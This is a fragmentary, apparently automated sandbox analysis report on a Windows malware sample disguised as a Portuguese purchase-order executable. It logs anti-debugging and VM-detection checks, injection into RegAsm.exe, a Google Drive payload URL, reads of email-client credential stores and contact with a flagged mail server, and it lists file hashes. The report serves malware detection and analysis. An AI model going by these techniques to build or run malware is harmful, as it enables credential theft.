Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Source: LISTA DE PEDIDO DE COMPRA.exe, 00000001.00000002.3241088664.0000000002250000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.7777894312.0000000000CB0000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: RegAsm.exe, 0000000A.00000002.7777894312.0000000000CB0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1S2E4RMU8PYTHWRTHVB17QS1CJAOOPUG3WININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
Source: LISTA DE PEDIDO DE COMPRA.exe, 00000001.00000002.3241088664.0000000002250000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
Source: LISTA DE PEDIDO DE COMPRA.exe, 00000001.00000002.3240672547.0000000000684000.00000004.00000020.sdmp	Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\mpasdlta.vdm			Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe	Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\mpavdlta.vdm			Jump to dropped file

Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF65797B530 SetUnhandledExceptionFilter,	26_2_00007FF65797B530
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF65797B798 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	26_2_00007FF65797B798
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF65797BF4C SetUnhandledExceptionFilter,	26_2_00007FF65797BF4C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF65797BD68 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_2_00007FF65797BD68
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF657963BFC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_2_00007FF657963BFC

Source: RegAsm.exe, 0000000A.00000002.7781970502.00000000013D0000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: RegAsm.exe, 0000000A.00000002.7781970502.00000000013D0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 0000000A.00000002.7781970502.00000000013D0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: RegAsm.exe, 0000000A.00000002.7781970502.00000000013D0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: Yara match	File source: 0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2320, type: MEMORYSTR

Windows Analysis Report LISTA DE PEDIDO DE COMPRA.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
109.169.39.245	mail.reyesyasociados.com	United Kingdom	20860	IOMART-ASGB	true
142.250.185.174	drive.google.com	United States	15169	GOOGLEUS	false
142.250.184.193	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false

ID:	1373
Product:	CloudBasic
Start time:	19:11:55
Start date:	27.09.2021
Sample:	LISTA DE PEDIDO DE COMPRA.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Architecture:	WINDOWS
MD5:	943986d4cb51d4cc29946aa7914dbc5b
SHA1:	cce8ec41fe0fabda407eaa5b8b9efc81168c5e5c
SHA256:	47d8b37351178ed6a40a269f3f42eb23fa0780a9a93098439275f7e66897a924
Filetype:	Win32 Executable (generic) a (10002005/4) 99.15%

Name	Type	MD5	SHA1	SHA256
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	PE32+ executable (GUI) x86-64, for MS Windows	01F92DC7A766FF783AE7AF40FD0334FB	45D7B8E98E22F939ED0083FE31204CAA9A72FA76	FA42B9B84754E2E8368E8929FA045BE86DBD72678176EE75814D2A16D23E5C26
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\mpasdlta.vdm	PE32+ executable (DLL) (console) x86-64, for MS Windows	4B1706881C1432AB95AE4627A8461836	733E0C23C6B4FD30EDD4A254193E7F28DD6C05BA	FBFFBA90A086FC69FCCCC451F5C01B26948555E89F9102129F990793ED95FAF8
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\mpavdlta.vdm	PE32+ executable (DLL) (console) x86-64, for MS Windows	BC34E855F085470BB9D748DF096CAB00	D89B1967D2AD60608A8EBF8E7CAE60F19E5D781D	80A20D4FD03088B1582376B66F97A13A2C99A7C2F3862E9376E821A4E44438D6
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\MpSigStub.log	Little-endian UTF-16 Unicode text, with CRLF, CR line terminators	405D83782043C1C978A139D893F96AB8	5B418987A5D89E9796F6473E9F30897B3F6DDA61	B653D1246B9D54FAB04B360A67C46765301326F093F748C68EFF56E8F0058E11
\Device\ConDrv	ASCII text, with CRLF line terminators	9F754B47B351EF0FC32527B541420595	006C66220B33E98C725B73495FE97B3291CE14D9	0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591